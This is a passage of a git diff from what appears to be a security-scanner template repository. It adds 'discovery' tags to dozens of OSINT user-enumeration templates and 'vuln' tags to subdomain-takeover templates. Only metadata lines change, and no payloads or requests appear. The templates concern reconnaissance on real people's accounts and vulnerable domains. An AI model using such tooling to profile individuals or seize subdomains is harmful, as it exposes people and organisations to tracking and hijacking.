a/http/osint/user-enumeration/utipio.yaml +++ b/http/osint/user-enumeration/utipio.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,utipio + tags: osint,osint-finance,utipio,discovery self-contained: true diff --git a/http/osint/user-enumeration/uwuai.yaml b/http/osint/user-enumeration/uwuai.yaml index 9bbecc92d40..547986625fe 100644 --- a/http/osint/user-enumeration/uwuai.yaml +++ b/http/osint/user-enumeration/uwuai.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,uwuai + tags: osint,osint-social,uwuai,discovery self-contained: true diff --git a/http/osint/user-enumeration/uwumarket.yaml b/http/osint/user-enumeration/uwumarket.yaml index f336613c37c..8c72f1890ac 100644 --- a/http/osint/user-enumeration/uwumarket.yaml +++ b/http/osint/user-enumeration/uwumarket.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,uwumarket + tags: osint,osint-business,uwumarket,discovery self-contained: true diff --git a/http/osint/user-enumeration/vampr.yaml b/http/osint/user-enumeration/vampr.yaml index eda8f35aab6..0248d395ee0 100644 --- a/http/osint/user-enumeration/vampr.yaml +++ b/http/osint/user-enumeration/vampr.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,vampr + tags: osint,osint-social,vampr,discovery self-contained: true diff --git a/http/osint/user-enumeration/venmo.yaml b/http/osint/user-enumeration/venmo.yaml index e19715686f6..52337d6be65 100644 --- a/http/osint/user-enumeration/venmo.yaml +++ b/http/osint/user-enumeration/venmo.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,venmo + tags: osint,osint-finance,venmo,discovery self-contained: true diff --git a/http/osint/user-enumeration/vero.yaml b/http/osint/user-enumeration/vero.yaml index 8f1638f5f34..4061a240b92 100644 --- a/http/osint/user-enumeration/vero.yaml +++ b/http/osint/user-enumeration/vero.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-art,vero + tags: osint,osint-art,vero,discovery self-contained: true diff --git a/http/osint/user-enumeration/vibilagare.yaml b/http/osint/user-enumeration/vibilagare.yaml index dc0fab5a88c..8efe5d93bb5 100644 --- a/http/osint/user-enumeration/vibilagare.yaml +++ b/http/osint/user-enumeration/vibilagare.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,vibilagare + tags: osint,osint-misc,vibilagare,discovery self-contained: true diff --git a/http/osint/user-enumeration/viddler.yaml b/http/osint/user-enumeration/viddler.yaml index 370f8be68af..5bd91121743 100644 --- a/http/osint/user-enumeration/viddler.yaml +++ b/http/osint/user-enumeration/viddler.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-video,viddler + tags: osint,osint-video,viddler,discovery self-contained: true diff --git a/http/osint/user-enumeration/vimeo.yaml b/http/osint/user-enumeration/vimeo.yaml index 815ca93cc9d..fd774fba1ca 100644 --- a/http/osint/user-enumeration/vimeo.yaml +++ b/http/osint/user-enumeration/vimeo.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-video,vimeo + tags: osint,osint-video,vimeo,discovery self-contained: true diff --git a/http/osint/user-enumeration/vine.yaml b/http/osint/user-enumeration/vine.yaml index 8eece0a3858..b7d1e77b6f2 100644 --- a/http/osint/user-enumeration/vine.yaml +++ b/http/osint/user-enumeration/vine.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-video,vine + tags: osint,osint-video,vine,discovery self-contained: true diff --git a/http/osint/user-enumeration/vip-blog.yaml b/http/osint/user-enumeration/vip-blog.yaml index 6c4f2245602..93b0c7659e4 100644 --- a/http/osint/user-enumeration/vip-blog.yaml +++ b/http/osint/user-enumeration/vip-blog.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-blog,vip-blog + tags: osint,osint-blog,vip-blog,discovery self-contained: true diff --git a/http/osint/user-enumeration/virustotal.yaml b/http/osint/user-enumeration/virustotal.yaml index e7adb304f7b..44bfd53254e 100644 --- a/http/osint/user-enumeration/virustotal.yaml +++ b/http/osint/user-enumeration/virustotal.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,virustotal + tags: osint,osint-misc,virustotal,discovery self-contained: true diff --git a/http/osint/user-enumeration/visnesscard.yaml b/http/osint/user-enumeration/visnesscard.yaml index db3ab61241a..d05cee64753 100644 --- a/http/osint/user-enumeration/visnesscard.yaml +++ b/http/osint/user-enumeration/visnesscard.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,visnesscard + tags: osint,osint-business,visnesscard,discovery self-contained: true diff --git a/http/osint/user-enumeration/vivino.yaml b/http/osint/user-enumeration/vivino.yaml index 8e9772a6f95..e494fd92ce4 100644 --- a/http/osint/user-enumeration/vivino.yaml +++ b/http/osint/user-enumeration/vivino.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-video,vivino + tags: osint,osint-video,vivino,discovery self-contained: true diff --git a/http/osint/user-enumeration/vk.yaml b/http/osint/user-enumeration/vk.yaml index 2f65ab80b3d..008b3c792b5 100644 --- a/http/osint/user-enumeration/vk.yaml +++ b/http/osint/user-enumeration/vk.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,vk + tags: osint,osint-social,vk,discovery self-contained: true diff --git a/http/osint/user-enumeration/vklworld-mastodon-instance.yaml b/http/osint/user-enumeration/vklworld-mastodon-instance.yaml index 37ff12a47d1..21a418beab2 100644 --- a/http/osint/user-enumeration/vklworld-mastodon-instance.yaml +++ b/http/osint/user-enumeration/vklworld-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,vklworld-mastodon-instance + tags: osint,osint-social,vklworld-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/vmstio-mastodon-instance.yaml b/http/osint/user-enumeration/vmstio-mastodon-instance.yaml index 99a452bcc27..d631ba10357 100644 --- a/http/osint/user-enumeration/vmstio-mastodon-instance.yaml +++ b/http/osint/user-enumeration/vmstio-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,vmstio-mastodon-instance + tags: osint,osint-social,vmstio-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/voice123.yaml b/http/osint/user-enumeration/voice123.yaml index 2114e4c152f..4203dba60cc 100644 --- a/http/osint/user-enumeration/voice123.yaml +++ b/http/osint/user-enumeration/voice123.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,voice123 + tags: osint,osint-hobby,voice123,discovery self-contained: true diff --git a/http/osint/user-enumeration/voicescom.yaml b/http/osint/user-enumeration/voicescom.yaml index dc5028a9064..ca7b214e2c7 100644 --- a/http/osint/user-enumeration/voicescom.yaml +++ b/http/osint/user-enumeration/voicescom.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,voicescom + tags: osint,osint-business,voicescom,discovery self-contained: true diff --git a/http/osint/user-enumeration/vsco.yaml b/http/osint/user-enumeration/vsco.yaml index 1e5efa0d468..019f739021f 100644 --- a/http/osint/user-enumeration/vsco.yaml +++ b/http/osint/user-enumeration/vsco.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,vsco + tags: osint,osint-social,vsco,discovery self-contained: true diff --git a/http/osint/user-enumeration/wanelo.yaml b/http/osint/user-enumeration/wanelo.yaml index 2a510c1770f..9c136f01a3a 100644 --- a/http/osint/user-enumeration/wanelo.yaml +++ b/http/osint/user-enumeration/wanelo.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,wanelo + tags: osint,osint-shopping,wanelo,discovery self-contained: true diff --git a/http/osint/user-enumeration/warriorforum.yaml b/http/osint/user-enumeration/warriorforum.yaml index e78c35c5cd4..3b2f0c22afc 100644 --- a/http/osint/user-enumeration/warriorforum.yaml +++ b/http/osint/user-enumeration/warriorforum.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,warriorforum + tags: osint,osint-hobby,warriorforum,discovery self-contained: true diff --git a/http/osint/user-enumeration/watchmemorecom.yaml b/http/osint/user-enumeration/watchmemorecom.yaml index bb4eaf00d4d..92ae9883e63 100644 --- a/http/osint/user-enumeration/watchmemorecom.yaml +++ b/http/osint/user-enumeration/watchmemorecom.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,watchmemorecom + tags: osint,osint-porn,watchmemorecom,discovery self-contained: true diff --git a/http/osint/user-enumeration/watchmyfeed.yaml b/http/osint/user-enumeration/watchmyfeed.yaml index c3b8c2f0acf..221f04ca335 100644 --- a/http/osint/user-enumeration/watchmyfeed.yaml +++ b/http/osint/user-enumeration/watchmyfeed.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,watchmyfeed + tags: osint,osint-porn,watchmyfeed,discovery self-contained: true diff --git a/http/osint/user-enumeration/wattpad.yaml b/http/osint/user-enumeration/wattpad.yaml index 21ccfa6f0ca..c0ba0f1e9db 100644 --- a/http/osint/user-enumeration/wattpad.yaml +++ b/http/osint/user-enumeration/wattpad.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,wattpad + tags: osint,osint-social,wattpad,discovery self-contained: true diff --git a/http/osint/user-enumeration/weasyl.yaml b/http/osint/user-enumeration/weasyl.yaml index 9af46ce1073..83b7bc1270a 100644 --- a/http/osint/user-enumeration/weasyl.yaml +++ b/http/osint/user-enumeration/weasyl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,weasyl + tags: osint,osint-images,weasyl,discovery self-contained: true diff --git a/http/osint/user-enumeration/weblate.yaml b/http/osint/user-enumeration/weblate.yaml index e8e02864abb..f7abfd8b8c0 100644 --- a/http/osint/user-enumeration/weblate.yaml +++ b/http/osint/user-enumeration/weblate.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-coding,weblate + tags: osint,osint-coding,weblate,discovery self-contained: true diff --git a/http/osint/user-enumeration/weebly.yaml b/http/osint/user-enumeration/weebly.yaml index da2e3d9ea27..d2f24e28e2b 100644 --- a/http/osint/user-enumeration/weebly.yaml +++ b/http/osint/user-enumeration/weebly.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,weebly + tags: osint,osint-misc,weebly,discovery self-contained: true diff --git a/http/osint/user-enumeration/wego.yaml b/http/osint/user-enumeration/wego.yaml index 5728afc9d0a..4c395cfea4c 100644 --- a/http/osint/user-enumeration/wego.yaml +++ b/http/osint/user-enumeration/wego.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-political,wego + tags: osint,osint-political,wego,discovery self-contained: true diff --git a/http/osint/user-enumeration/weheartit.yaml b/http/osint/user-enumeration/weheartit.yaml index acedb3ac5b0..b9a476aa749 100644 --- a/http/osint/user-enumeration/weheartit.yaml +++ b/http/osint/user-enumeration/weheartit.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,weheartit + tags: osint,osint-social,weheartit,discovery self-contained: true diff --git a/http/osint/user-enumeration/weibo.yaml b/http/osint/user-enumeration/weibo.yaml index 446bf77ffbd..eedbe4ec37f 100644 --- a/http/osint/user-enumeration/weibo.yaml +++ b/http/osint/user-enumeration/weibo.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,weibo + tags: osint,osint-social,weibo,discovery self-contained: true diff --git a/http/osint/user-enumeration/wetransfer.yaml b/http/osint/user-enumeration/wetransfer.yaml index c2c43de273a..f5203c1b27e 100644 --- a/http/osint/user-enumeration/wetransfer.yaml +++ b/http/osint/user-enumeration/wetransfer.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,wetransfer + tags: osint,osint-misc,wetransfer,discovery self-contained: true diff --git a/http/osint/user-enumeration/wikidot.yaml b/http/osint/user-enumeration/wikidot.yaml index 7caafd02014..f24a6868b57 100644 --- a/http/osint/user-enumeration/wikidot.yaml +++ b/http/osint/user-enumeration/wikidot.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,wikidot + tags: osint,osint-social,wikidot,discovery self-contained: true diff --git a/http/osint/user-enumeration/wikipedia.yaml b/http/osint/user-enumeration/wikipedia.yaml index 9b0a22989ef..33d7d6b492a 100644 --- a/http/osint/user-enumeration/wikipedia.yaml +++ b/http/osint/user-enumeration/wikipedia.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-news,wikipedia + tags: osint,osint-news,wikipedia,discovery self-contained: true diff --git a/http/osint/user-enumeration/wimkin-publicprofile.yaml b/http/osint/user-enumeration/wimkin-publicprofile.yaml index ecaa1cc4c94..62fe5555050 100644 --- a/http/osint/user-enumeration/wimkin-publicprofile.yaml +++ b/http/osint/user-enumeration/wimkin-publicprofile.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-political,wimkin-publicprofile + tags: osint,osint-political,wimkin-publicprofile,discovery self-contained: true diff --git a/http/osint/user-enumeration/wireclub.yaml b/http/osint/user-enumeration/wireclub.yaml index 44b5a0f27aa..27f52641bb1 100644 --- a/http/osint/user-enumeration/wireclub.yaml +++ b/http/osint/user-enumeration/wireclub.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,wireclub + tags: osint,osint-social,wireclub,discovery self-contained: true diff --git a/http/osint/user-enumeration/wishlistr.yaml b/http/osint/user-enumeration/wishlistr.yaml index c3ad2648c9a..6184ab48adb 100644 --- a/http/osint/user-enumeration/wishlistr.yaml +++ b/http/osint/user-enumeration/wishlistr.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,wishlistr + tags: osint,osint-shopping,wishlistr,discovery self-contained: true diff --git a/http/osint/user-enumeration/wolni-slowianie.yaml b/http/osint/user-enumeration/wolni-slowianie.yaml index 05c2ab947d2..4b4dc9bca00 100644 --- a/http/osint/user-enumeration/wolni-slowianie.yaml +++ b/http/osint/user-enumeration/wolni-slowianie.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,wolni-slowianie + tags: osint,osint-social,wolni-slowianie,discovery self-contained: true diff --git a/http/osint/user-enumeration/wordnik.yaml b/http/osint/user-enumeration/wordnik.yaml index 98ac102b04a..7869ab3804a 100644 --- a/http/osint/user-enumeration/wordnik.yaml +++ b/http/osint/user-enumeration/wordnik.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,wordnik + tags: osint,osint-gaming,wordnik,discovery self-contained: true diff --git a/http/osint/user-enumeration/wordpress-site.yaml b/http/osint/user-enumeration/wordpress-site.yaml index 241722e5885..4445863355e 100644 --- a/http/osint/user-enumeration/wordpress-site.yaml +++ b/http/osint/user-enumeration/wordpress-site.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: osint,osint-blog,wordpress + tags: osint,osint-blog,wordpress,discovery self-contained: true diff --git a/http/osint/user-enumeration/wordpress-support.yaml b/http/osint/user-enumeration/wordpress-support.yaml index d394b46c455..57d033fa602 100644 --- a/http/osint/user-enumeration/wordpress-support.yaml +++ b/http/osint/user-enumeration/wordpress-support.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-blog,wordpress-support + tags: osint,osint-blog,wordpress-support,discovery self-contained: true diff --git a/http/osint/user-enumeration/wordpress.yaml b/http/osint/user-enumeration/wordpress.yaml index a60e0d67183..cce8b543e2d 100644 --- a/http/osint/user-enumeration/wordpress.yaml +++ b/http/osint/user-enumeration/wordpress.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-blog,wordpress + tags: osint,osint-blog,wordpress,discovery self-contained: true diff --git a/http/osint/user-enumeration/wowhead.yaml b/http/osint/user-enumeration/wowhead.yaml index 9e9ffade954..7fd8538bd7a 100644 --- a/http/osint/user-enumeration/wowhead.yaml +++ b/http/osint/user-enumeration/wowhead.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,wowhead + tags: osint,osint-gaming,wowhead,discovery self-contained: true diff --git a/http/osint/user-enumeration/wykop.yaml b/http/osint/user-enumeration/wykop.yaml index 897ee6d4077..43468730417 100644 --- a/http/osint/user-enumeration/wykop.yaml +++ b/http/osint/user-enumeration/wykop.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,wykop + tags: osint,osint-social,wykop,discovery self-contained: true diff --git a/http/osint/user-enumeration/xanga.yaml b/http/osint/user-enumeration/xanga.yaml index 1bccfa8209b..859f3c863ed 100644 --- a/http/osint/user-enumeration/xanga.yaml +++ b/http/osint/user-enumeration/xanga.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-blog,xanga + tags: osint,osint-blog,xanga,discovery self-contained: true diff --git a/http/osint/user-enumeration/xbox-gamertag.yaml b/http/osint/user-enumeration/xbox-gamertag.yaml index e9fee109942..211ff5529d3 100644 --- a/http/osint/user-enumeration/xbox-gamertag.yaml +++ b/http/osint/user-enumeration/xbox-gamertag.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,xbox-gamertag + tags: osint,osint-gaming,xbox-gamertag,discovery self-contained: true diff --git a/http/osint/user-enumeration/xhamster.yaml b/http/osint/user-enumeration/xhamster.yaml index 1ed10ea8010..a5bc8bb5fc6 100644 --- a/http/osint/user-enumeration/xhamster.yaml +++ b/http/osint/user-enumeration/xhamster.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,xhamster + tags: osint,osint-porn,xhamster,discovery self-contained: true diff --git a/http/osint/user-enumeration/xing.yaml b/http/osint/user-enumeration/xing.yaml index d3a42074f44..2bf0390bb2b 100644 --- a/http/osint/user-enumeration/xing.yaml +++ b/http/osint/user-enumeration/xing.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,xing + tags: osint,osint-social,xing,discovery self-contained: true diff --git a/http/osint/user-enumeration/xvideos-models.yaml b/http/osint/user-enumeration/xvideos-models.yaml index 3891d39f75d..4965eeebd28 100644 --- a/http/osint/user-enumeration/xvideos-models.yaml +++ b/http/osint/user-enumeration/xvideos-models.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,xvideos-models + tags: osint,osint-porn,xvideos-models,discovery self-contained: true diff --git a/http/osint/user-enumeration/xvideos-profiles.yaml b/http/osint/user-enumeration/xvideos-profiles.yaml index 3b21be320c1..d43c95f7701 100644 --- a/http/osint/user-enumeration/xvideos-profiles.yaml +++ b/http/osint/user-enumeration/xvideos-profiles.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,xvideos-profiles + tags: osint,osint-porn,xvideos-profiles,discovery self-contained: true diff --git a/http/osint/user-enumeration/yahoo-japan-auction.yaml b/http/osint/user-enumeration/yahoo-japan-auction.yaml index 8859460cad0..b9a5f9ab718 100644 --- a/http/osint/user-enumeration/yahoo-japan-auction.yaml +++ b/http/osint/user-enumeration/yahoo-japan-auction.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,yahoo-japan-auction + tags: osint,osint-shopping,yahoo-japan-auction,discovery self-contained: true diff --git a/http/osint/user-enumeration/yapishu.yaml b/http/osint/user-enumeration/yapishu.yaml index 1837a84d162..c9062565a0d 100644 --- a/http/osint/user-enumeration/yapishu.yaml +++ b/http/osint/user-enumeration/yapishu.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,yapishu + tags: osint,osint-hobby,yapishu,discovery self-contained: true diff --git a/http/osint/user-enumeration/yazawaj.yaml b/http/osint/user-enumeration/yazawaj.yaml index 5dedcde9623..04f6c7b7c2c 100644 --- a/http/osint/user-enumeration/yazawaj.yaml +++ b/http/osint/user-enumeration/yazawaj.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-dating,yazawaj + tags: osint,osint-dating,yazawaj,discovery self-contained: true diff --git a/http/osint/user-enumeration/yelp.yaml b/http/osint/user-enumeration/yelp.yaml index 64b6e335521..7c6d1e55821 100644 --- a/http/osint/user-enumeration/yelp.yaml +++ b/http/osint/user-enumeration/yelp.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,yelp + tags: osint,osint-shopping,yelp,discovery self-contained: true diff --git a/http/osint/user-enumeration/yeswehack.yaml b/http/osint/user-enumeration/yeswehack.yaml index 0d596053515..cbe28d083e2 100644 --- a/http/osint/user-enumeration/yeswehack.yaml +++ b/http/osint/user-enumeration/yeswehack.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,yeswehack + tags: osint,osint-tech,yeswehack,discovery self-contained: true diff --git a/http/osint/user-enumeration/younow.yaml b/http/osint/user-enumeration/younow.yaml index d53a840ba80..72007a3c58a 100644 --- a/http/osint/user-enumeration/younow.yaml +++ b/http/osint/user-enumeration/younow.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-social,younow + tags: osint,osint-social,younow,discovery self-contained: true diff --git a/http/osint/user-enumeration/youpic.yaml b/http/osint/user-enumeration/youpic.yaml index 2c2059671c7..1a2c74d45b1 100644 --- a/http/osint/user-enumeration/youpic.yaml +++ b/http/osint/user-enumeration/youpic.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,youpic + tags: osint,osint-hobby,youpic,discovery self-contained: true diff --git a/http/osint/user-enumeration/youtube.yaml b/http/osint/user-enumeration/youtube.yaml index 356aeae19eb..8c55669c2d5 100644 --- a/http/osint/user-enumeration/youtube.yaml +++ b/http/osint/user-enumeration/youtube.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 3 - tags: osint,osint-video,youtube + tags: osint,osint-video,youtube,discovery self-contained: true diff --git a/http/osint/user-enumeration/zatrybipl.yaml b/http/osint/user-enumeration/zatrybipl.yaml index eaa87775c18..ab511a4267b 100644 --- a/http/osint/user-enumeration/zatrybipl.yaml +++ b/http/osint/user-enumeration/zatrybipl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,zatrybipl + tags: osint,osint-tech,zatrybipl,discovery self-contained: true diff --git a/http/osint/user-enumeration/zbiornik.yaml b/http/osint/user-enumeration/zbiornik.yaml index 521e513d4b2..8e814aab6bf 100644 --- a/http/osint/user-enumeration/zbiornik.yaml +++ b/http/osint/user-enumeration/zbiornik.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,zbiornik + tags: osint,osint-porn,zbiornik,discovery self-contained: true diff --git a/http/osint/user-enumeration/zhihu.yaml b/http/osint/user-enumeration/zhihu.yaml index 1458a106ebd..748d2cc91f8 100644 --- a/http/osint/user-enumeration/zhihu.yaml +++ b/http/osint/user-enumeration/zhihu.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,zhihu + tags: osint,osint-social,zhihu,discovery self-contained: true diff --git a/http/osint/user-enumeration/zillow.yaml b/http/osint/user-enumeration/zillow.yaml index 127e08dd1c1..ca6747e797e 100644 --- a/http/osint/user-enumeration/zillow.yaml +++ b/http/osint/user-enumeration/zillow.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,zillow + tags: osint,osint-shopping,zillow,discovery self-contained: true diff --git a/http/osint/user-enumeration/zmarsacom.yaml b/http/osint/user-enumeration/zmarsacom.yaml index 2a443c1fd57..0f48c9b79b7 100644 --- a/http/osint/user-enumeration/zmarsacom.yaml +++ b/http/osint/user-enumeration/zmarsacom.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,zmarsacom + tags: osint,osint-porn,zmarsacom,discovery self-contained: true diff --git a/http/osint/user-enumeration/zomato.yaml b/http/osint/user-enumeration/zomato.yaml index 8fd9cccdf8d..f7aa6d1f65c 100644 --- a/http/osint/user-enumeration/zomato.yaml +++ b/http/osint/user-enumeration/zomato.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,zomato + tags: osint,osint-social,zomato,discovery self-contained: true diff --git a/http/osint/user-enumeration/zoomitir.yaml b/http/osint/user-enumeration/zoomitir.yaml index b0b4034d98b..2f0553d59b3 100644 --- a/http/osint/user-enumeration/zoomitir.yaml +++ b/http/osint/user-enumeration/zoomitir.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,zoomitir + tags: osint,osint-tech,zoomitir,discovery self-contained: true diff --git a/http/takeovers/aftership-takeover.yaml b/http/takeovers/aftership-takeover.yaml index 15920aefaf8..cb4cd3c19cf 100644 --- a/http/takeovers/aftership-takeover.yaml +++ b/http/takeovers/aftership-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/agilecrm-takeover.yaml b/http/takeovers/agilecrm-takeover.yaml index 92b107a14b8..8ee39db58a6 100644 --- a/http/takeovers/agilecrm-takeover.yaml +++ b/http/takeovers/agilecrm-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/145 metadata: max-request: 1 - tags: takeover,agilecrm + tags: takeover,agilecrm,vuln http: - method: GET diff --git a/http/takeovers/aha-takeover.yaml b/http/takeovers/aha-takeover.yaml index cede6b5b428..fb3c00f4167 100644 --- a/http/takeovers/aha-takeover.yaml +++ b/http/takeovers/aha-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/airee-takeover.yaml b/http/takeovers/airee-takeover.yaml index e8b52117c08..5839522824e 100644 --- a/http/takeovers/airee-takeover.yaml +++ b/http/takeovers/airee-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/104 metadata: max-request: 1 - tags: takeover,airee + tags: takeover,airee,vuln http: - method: GET diff --git a/http/takeovers/anima-takeover.yaml b/http/takeovers/anima-takeover.yaml index 2694f03c7a7..8b0b6e3614b 100644 --- a/http/takeovers/anima-takeover.yaml +++ b/http/takeovers/anima-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/126 metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/announcekit-takeover.yaml b/http/takeovers/announcekit-takeover.yaml index 918a1eeb854..310a9024049 100644 --- a/http/takeovers/announcekit-takeover.yaml +++ b/http/takeovers/announcekit-takeover.yaml @@ -10,7 +10,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228 metadata: max-request: 1 - tags: takeover,announcekit + tags: takeover,announcekit,vuln http: - method: GET diff --git a/http/takeovers/aws-bucket-takeover.yaml b/http/takeovers/aws-bucket-takeover.yaml index cac7a65f003..f48c8a2bb49 100644 --- a/http/takeovers/aws-bucket-takeover.yaml +++ b/http/takeovers/aws-bucket-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/36 metadata: max-request: 1 - tags: takeover,aws,bucket + tags: takeover,aws,bucket,vuln http: - method: GET diff --git a/http/takeovers/bigcartel-takeover.yaml b/http/takeovers/bigcartel-takeover.yaml index a218eb97e50..33169677b50 100644 --- a/http/takeovers/bigcartel-takeover.yaml +++ b/http/takeovers/bigcartel-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/158 metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/bitbucket-takeover.yaml 